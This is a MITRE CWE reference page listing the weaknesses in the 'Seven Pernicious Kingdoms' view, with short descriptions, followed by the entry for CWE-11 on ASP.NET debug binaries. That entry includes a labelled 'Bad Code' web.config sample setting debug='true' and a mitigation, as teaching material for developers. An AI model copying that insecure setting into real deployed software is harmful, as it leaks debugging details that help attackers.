CWE

Common Weakness Enumeration

A Community-Developed List of Software Weakness Types

CWE/SANS Top 25 Most Dangerous Software Errors
Home > CWE List > VIEW SLICE: CWE-700: Seven Pernicious Kingdoms (2.11)  
ID

CWE VIEW: Seven Pernicious Kingdoms

View ID: 700
Structure: Graph
Status: Incomplete
Presentation Filter:
+ View Data

View Objective

This view (graph) organizes weaknesses using a hierarchical structure that is similar to that used by Seven Pernicious Kingdoms.

+ View Audience
StakeholderDescription
Developers

This view is useful for developers because it is organized around concepts with which developers are familiar, and it focuses on weaknesses that can be detected using source code analysis tools.

+ Alternate Terms
7PK:

"7PK" is frequently used by the MITRE team as an abbreviation.

+ Relationships
Show Details:
700 - Seven Pernicious Kingdoms
+CategoryCategoryEnvironment - (2)
700 (Seven Pernicious Kingdoms) > 2 (Environment)
Weaknesses in this category are typically introduced during unexpected environmental conditions.
*Weakness VariantWeakness VariantASP.NET Misconfiguration: Creating Debug Binary - (11)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 11 (ASP.NET Misconfiguration: Creating Debug Binary)
Debugging messages help attackers learn about the system and plan a form of attack.
*Weakness VariantWeakness VariantASP.NET Misconfiguration: Missing Custom Error Page - (12)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 12 (ASP.NET Misconfiguration: Missing Custom Error Page)
An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.
*Weakness VariantWeakness VariantASP.NET Misconfiguration: Password in Configuration File - (13)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 13 (ASP.NET Misconfiguration: Password in Configuration File)
Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.
*Weakness BaseWeakness BaseCompiler Removal of Code to Clear Buffers - (14)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 14 (Compiler Removal of Code to Clear Buffers)
Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal."
*Weakness VariantWeakness VariantJ2EE Misconfiguration: Data Transmission Without Encryption - (5)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 5 (J2EE Misconfiguration: Data Transmission Without Encryption)
Information sent over a network can be compromised while in transit. An attacker may be able to read/modify the contents if the data are sent in plaintext or are weakly encrypted.
*Weakness VariantWeakness VariantJ2EE Misconfiguration: Entity Bean Declared Remote - (8)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 8 (J2EE Misconfiguration: Entity Bean Declared Remote)
When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities.
*Weakness VariantWeakness VariantJ2EE Misconfiguration: Insufficient Session-ID Length - (6)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 6 (J2EE Misconfiguration: Insufficient Session-ID Length)
The J2EE application is configured to use an insufficient session ID length.
*Weakness VariantWeakness VariantJ2EE Misconfiguration: Missing Custom Error Page - (7)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 7 (J2EE Misconfiguration: Missing Custom Error Page)
The default error page of a web application should not display sensitive information about the software system.
*Weakness VariantWeakness VariantJ2EE Misconfiguration: Weak Access Permissions for EJB Methods - (9)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 9 (J2EE Misconfiguration: Weak Access Permissions for EJB Methods)
If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system.
+CategoryCategoryError Handling - (388)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling)
This category includes weaknesses that occur when an application does not properly handle errors that occur during processing.
*Weakness BaseWeakness BaseDeclaration of Catch for Generic Exception - (396)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 396 (Declaration of Catch for Generic Exception)
Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
*Weakness BaseWeakness BaseDeclaration of Throws for Generic Exception - (397)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 397 (Declaration of Throws for Generic Exception)
Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
*Weakness BaseWeakness BaseUnchecked Error Condition - (391)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 391 (Unchecked Error Condition)
Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.
*Weakness BaseWeakness BaseUse of NullPointerException Catch to Detect NULL Pointer Dereference - (395)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 395 (Use of NullPointerException Catch to Detect NULL Pointer Dereference)
Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.
+Weakness ClassWeakness ClassImproper Fulfillment of API Contract ('API Abuse') - (227)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse'))
The software uses an API in a manner contrary to its intended use.API Abuse
*Weakness VariantWeakness VariantCreation of chroot Jail Without Changing Working Directory - (243)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 243 (Creation of chroot Jail Without Changing Working Directory)
The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.
*Weakness ClassWeakness ClassExecution with Unnecessary Privileges - (250)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 250 (Execution with Unnecessary Privileges)
The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.
*Weakness VariantWeakness VariantImproper Clearing of Heap Memory Before Release ('Heap Inspection') - (244)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 244 (Improper Clearing of Heap Memory Before Release ('Heap Inspection'))
Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.
*Weakness VariantWeakness VariantJ2EE Bad Practices: Direct Management of Connections - (245)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 245 (J2EE Bad Practices: Direct Management of Connections)
The J2EE application directly manages connections, instead of using the container's connection management facilities.
*Weakness VariantWeakness VariantJ2EE Bad Practices: Direct Use of Sockets - (246)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 246 (J2EE Bad Practices: Direct Use of Sockets)
The J2EE application directly uses sockets instead of using framework method calls.
*CategoryCategoryOften Misused: String Management - (251)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 251 (Often Misused: String Management)
Functions that manipulate strings encourage buffer overflows.
*Weakness BaseWeakness BaseUncaught Exception - (248)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 248 (Uncaught Exception)
An exception is thrown from a function, but it is not caught.
*Weakness BaseWeakness BaseUnchecked Return Value - (252)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 252 (Unchecked Return Value)
The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.
*Weakness BaseWeakness BaseUse of Inherently Dangerous Function - (242)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 242 (Use of Inherently Dangerous Function)
The program calls a function that can never be guaranteed to work safely.
*Weakness VariantWeakness VariantUse of getlogin() in Multithreaded Application - (558)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 558 (Use of getlogin() in Multithreaded Application)
The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.
+Weakness ClassWeakness ClassIndicator of Poor Code Quality - (398)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality)
The code has features that do not directly introduce a weakness or vulnerability, but indicate that the product has not been carefully developed or maintained.
*Weakness VariantWeakness VariantDouble Free - (415)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 415 (Double Free)
The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.Double-free
*Weakness BaseWeakness BaseImproper Release of Memory Before Removing Last Reference ('Memory Leak') - (401)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 401 (Improper Release of Memory Before Removing Last Reference ('Memory Leak'))
The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory.Memory Leak
*Weakness BaseWeakness BaseImproper Resource Shutdown or Release - (404)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 404 (Improper Resource Shutdown or Release)
The program does not release or incorrectly releases a resource before it is made available for re-use.
*Weakness BaseWeakness BaseNULL Pointer Dereference - (476)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 476 (NULL Pointer Dereference)
A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.
*Weakness BaseWeakness BaseUndefined Behavior for Input to API - (475)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 475 (Undefined Behavior for Input to API)
The behavior of this function is undefined unless its control parameter is set to a specific value.
*Weakness BaseWeakness BaseUse After Free - (416)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 416 (Use After Free)
Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.Dangling pointerUse-After-Free
*Weakness BaseWeakness BaseUse of Function with Inconsistent Implementations - (474)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 474 (Use of Function with Inconsistent Implementations)
The code uses a function that has inconsistent implementations across operating systems and versions.
*Weakness BaseWeakness BaseUse of Obsolete Functions - (477)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 477 (Use of Obsolete Functions)
The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.
*Weakness VariantWeakness VariantUse of Uninitialized Variable - (457)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 457 (Use of Uninitialized Variable)
The code uses a variable that has not been initialized, leading to unpredictable or unintended results.
+CategoryCategoryInput Validation and Representation - (1005)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation)
This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that exist when an application does not properly validate or represent input.
*Weakness BaseWeakness BaseImproper Control of Resource Identifiers ('Resource Injection') - (99)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 99 (Improper Control of Resource Identifiers ('Resource Injection'))
The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.Insecure Direct Object Reference
+Weakness ClassWeakness ClassImproper Input Validation - (20)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation)
The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.
*Weakness BaseWeakness BaseBuffer Copy without Checking Size of Input ('Classic Buffer Overflow') - (120)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))
The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.buffer overrunUnbounded Transfer
*Weakness BaseWeakness BaseDirect Use of Unsafe JNI - (111)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 111 (Direct Use of Unsafe JNI)
When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.
*Weakness ClassWeakness ClassExternal Control of File Name or Path - (73)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 73 (External Control of File Name or Path)
The software allows user input to control or influence paths or file names that are used in filesystem operations.
*Weakness BaseWeakness BaseExternal Control of System or Configuration Setting - (15)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 15 (External Control of System or Configuration Setting)
One or more system settings or configuration elements can be externally controlled by a user.
*Weakness BaseWeakness BaseImproper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') - (113)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 113 (Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting'))
The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
*Weakness BaseWeakness BaseImproper Null Termination - (170)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 170 (Improper Null Termination)
The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.
*Weakness BaseWeakness BaseImproper Output Neutralization for Logs - (117)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 117 (Improper Output Neutralization for Logs)
The software does not neutralize or incorrectly neutralizes output that is written to logs.
*Weakness ClassWeakness ClassImproper Restriction of Operations within the Bounds of a Memory Buffer - (119)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)
The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.Memory Corruption
*Weakness BaseWeakness BaseInteger Overflow or Wraparound - (190)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 190 (Integer Overflow or Wraparound)
The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.
*Weakness BaseWeakness BaseMissing XML Validation - (112)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 112 (Missing XML Validation)
The software accepts XML from an untrusted source but does not validate the XML against the proper schema.
*Weakness BaseWeakness BaseProcess Control - (114)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 114 (Process Control)
Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.
*Weakness BaseWeakness BaseReturn of Pointer Value Outside of Expected Range - (466)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 466 (Return of Pointer Value Outside of Expected Range)
A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.
*Weakness VariantWeakness VariantStruts: Duplicate Validation Forms - (102)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 102 (Struts: Duplicate Validation Forms)
The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.
*Weakness VariantWeakness VariantStruts: Form Bean Does Not Extend Validation Class - (104)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 104 (Struts: Form Bean Does Not Extend Validation Class)
If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.
*Weakness VariantWeakness VariantStruts: Form Field Without Validator - (105)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 105 (Struts: Form Field Without Validator)
The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.
*Weakness VariantWeakness VariantStruts: Incomplete validate() Method Definition - (103)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 103 (Struts: Incomplete validate() Method Definition)
The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().
*Weakness VariantWeakness VariantStruts: Plug-in Framework not in Use - (106)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 106 (Struts: Plug-in Framework not in Use)
When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.
*Weakness VariantWeakness VariantStruts: Unused Validation Form - (107)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 107 (Struts: Unused Validation Form)
An unused validation form indicates that validation logic is not up-to-date.
*Weakness VariantWeakness VariantStruts: Unvalidated Action Form - (108)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 108 (Struts: Unvalidated Action Form)
Every Action Form must have a corresponding validation form.
*Weakness VariantWeakness VariantStruts: Validator Turned Off - (109)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 109 (Struts: Validator Turned Off)
Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.
*Weakness VariantWeakness VariantStruts: Validator Without Form Field - (110)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 110 (Struts: Validator Without Form Field)
Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.
*Weakness BaseWeakness BaseUse of Externally-Controlled Format String - (134)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 134 (Use of Externally-Controlled Format String)
The software uses a function that accepts a format string as an argument, but the format string originates from an external source.
*Weakness BaseWeakness BaseUse of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') - (470)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 470 (Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection'))
The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.Reflection Injection
*Weakness VariantWeakness VariantUse of Path Manipulation Function without Maximum-sized Buffer - (785)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 785 (Use of Path Manipulation Function without Maximum-sized Buffer)
The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.
*Weakness BaseWeakness BaseImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - (79)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.XSSCSS
*Weakness ClassWeakness ClassImproper Neutralization of Special Elements used in a Command ('Command Injection') - (77)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 77 (Improper Neutralization of Special Elements used in a Command ('Command Injection'))
The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
*Weakness BaseWeakness BaseImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - (89)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
+Weakness ClassWeakness ClassInsufficient Encapsulation - (485)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation)
The product does not sufficiently encapsulate critical data or functionality.
*Weakness VariantWeakness VariantComparison of Classes by Name - (486)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 486 (Comparison of Classes by Name)
The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.
*Weakness VariantWeakness VariantCritical Public Variable Without Final Modifier - (493)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 493 (Critical Public Variable Without Final Modifier)
The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.
*Weakness VariantWeakness VariantExposure of Data Element to Wrong Session - (488)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 488 (Exposure of Data Element to Wrong Session)
The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.
*Weakness VariantWeakness VariantExposure of System Data to an Unauthorized Control Sphere - (497)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 497 (Exposure of System Data to an Unauthorized Control Sphere)
Exposing system data or debugging information helps an adversary learn about the system and form an attack plan.
*Weakness BaseWeakness BaseLeftover Debug Code - (489)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 489 (Leftover Debug Code)
The application can be deployed with active debugging code that can create unintended entry points.
*CategoryCategoryMobile Code Issues - (490)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 490 (Mobile Code Issues)
Weaknesses in this category are frequently found in mobile code.
*Weakness VariantWeakness VariantPrivate Array-Typed Field Returned From A Public Method - (495)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 495 (Private Array-Typed Field Returned From A Public Method)
The product has a method that is declared public, but returns a reference to a private array, which could then be modified in unexpected ways.
*Weakness VariantWeakness VariantPublic Data Assigned to Private Array-Typed Field - (496)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 496 (Public Data Assigned to Private Array-Typed Field)
Assigning public data to a private array is equivalent to giving public access to the array.
*Weakness VariantWeakness VariantPublic cloneable() Method Without Final ('Object Hijack') - (491)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 491 (Public cloneable() Method Without Final ('Object Hijack'))
A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.
*Weakness BaseWeakness BaseTrust Boundary Violation - (501)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 501 (Trust Boundary Violation)
The product mixes trusted and untrusted data in the same data structure or structured message.
*Weakness VariantWeakness VariantUse of Inner Class Containing Sensitive Data - (492)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 492 (Use of Inner Class Containing Sensitive Data)
Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.
+CategoryCategorySecurity Features - (254)
700 (Seven Pernicious Kingdoms) > 254 (Security Features)
Software security is not security software. Here we're concerned with topics like authentication, access control, confidentiality, cryptography, and privilege management.
*Weakness VariantWeakness VariantEmpty Password in Configuration File - (258)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 258 (Empty Password in Configuration File)
Using an empty string as a password is insecure.
*Weakness ClassWeakness ClassExposure of Private Information ('Privacy Violation') - (359)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 359 (Exposure of Private Information ('Privacy Violation'))
The software does not properly prevent private data (such as credit card numbers) from being accessed by actors who either (1) are not explicitly authorized to access the data or (2) do not have the implicit consent of the people to which the data is related. Privacy leakPrivacy leakage
*Weakness ClassWeakness ClassImproper Authorization - (285)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 285 (Improper Authorization)
The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.AuthZ
*Weakness BaseWeakness BaseLeast Privilege Violation - (272)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 272 (Least Privilege Violation)
The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.
*Weakness VariantWeakness VariantPassword in Configuration File - (260)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 260 (Password in Configuration File)
The software stores a password in a configuration file that might be accessible to actors who do not know the password.
*Weakness VariantWeakness VariantPlaintext Storage of a Password - (256)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 256 (Plaintext Storage of a Password)
Storing a password in plaintext may result in a system compromise.
*Weakness BaseWeakness BaseUse of Hard-coded Credentials - (798)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 798 (Use of Hard-coded Credentials)
The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
*Weakness BaseWeakness BaseUse of Hard-coded Password - (259)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 259 (Use of Hard-coded Password)
The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.
*Weakness ClassWeakness ClassUse of Insufficiently Random Values - (330)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 330 (Use of Insufficiently Random Values)
The software may use insufficiently random numbers or values in a security context that depends on unpredictable numbers.
*Weakness VariantWeakness VariantWeak Cryptography for Passwords - (261)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 261 (Weak Cryptography for Passwords)
Obscuring a password with a trivial encoding does not protect the password.
+CategoryCategoryTime and State - (361)
700 (Seven Pernicious Kingdoms) > 361 (Time and State)
Weaknesses in this category are related to the improper management of time and state in an environment that supports simultaneous or near-simultaneous computation by multiple systems, processes, or threads.
*Weakness BaseWeakness BaseInsecure Temporary File - (377)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 377 (Insecure Temporary File)
Creating and using insecure temporary files can leave application and system data vulnerable to attack.
*Weakness VariantWeakness VariantJ2EE Bad Practices: Direct Use of Threads - (383)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 383 (J2EE Bad Practices: Direct Use of Threads)
Thread management in a Web application is forbidden in some circumstances and is always highly error prone.
*Weakness VariantWeakness VariantJ2EE Bad Practices: Use of System.exit() - (382)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 382 (J2EE Bad Practices: Use of System.exit())
A J2EE application uses System.exit(), which also shuts down its container.
+Compound Element: CompositeCompound Element: CompositeSession Fixation - (384)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation)
Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.
*Weakness BaseWeakness BaseExternal Control of Assumed-Immutable Web Parameter - (472)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 472 (External Control of Assumed-Immutable Web Parameter)
The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.Assumed-Immutable Parameter Tampering
*Weakness BaseWeakness BaseOrigin Validation Error - (346)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 346 (Origin Validation Error)
The software does not properly verify that the source of data or communication is valid.
*Weakness ClassWeakness ClassUnintended Proxy or Intermediary ('Confused Deputy') - (441)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 441 (Unintended Proxy or Intermediary ('Confused Deputy'))
The software receives a request, message, or directive from an upstream component, but the software does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the software's control sphere. This causes the software to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.Confused Deputy
*Weakness BaseWeakness BaseSignal Handler Race Condition - (364)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 364 (Signal Handler Race Condition)
The software uses a signal handler that introduces a race condition.
*CategoryCategoryTemporary File Issues - (376)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 376 (Temporary File Issues)
Weaknesses in this category are related to improper handling of temporary files.
*Weakness BaseWeakness BaseTime-of-check Time-of-use (TOCTOU) Race Condition - (367)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 367 (Time-of-check Time-of-use (TOCTOU) Race Condition)
The software checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.TOCTTOUTOCCTOU
*Weakness BaseWeakness BaseUnrestricted Externally Accessible Lock - (412)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 412 (Unrestricted Externally Accessible Lock)
The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2008-09-09MITREInternal CWE Team
Modifications
Modification DateModifierOrganizationSource
2017-05-03CWE Content TeamMITREInternal
updated Relationships
+ View Metrics
CWEs in this viewTotal CWEs
Total98out of1006
Views0out of33
Categories8out of245
Weaknesses89out of720
Compound_Elements1out of8
View Components
View Components
A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z

CWE-11: ASP.NET Misconfiguration: Creating Debug Binary

Weakness ID: 11
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

Debugging messages help attackers learn about the system and plan a form of attack.

Extended Description

ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.

+ Time of Introduction
  • Implementation
  • Operation
+ Applicable Platforms

Languages

.NET

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application.

+ Demonstrative Examples

Example 1

The file web.config contains the debug mode setting. Setting debug to "true" will let the browser display debugging information.

(Bad Code)
Example Language: XML 
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<system.web>
<compilation
defaultLanguage="c#"
debug="true"
/>
...
</system.web>
</configuration>

Change the debug mode to false when the application is deployed into production.

+ Potential Mitigations

Phase: System Configuration

Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production.

+ Background Details

The debug attribute of the <compilation> tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory2Environment
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory10ASP.NET Environment Issues
Development Concepts (primary)699
ChildOfWeakness VariantWeakness Variant215Information Exposure Through Debug Information
Research Concepts (primary)1000
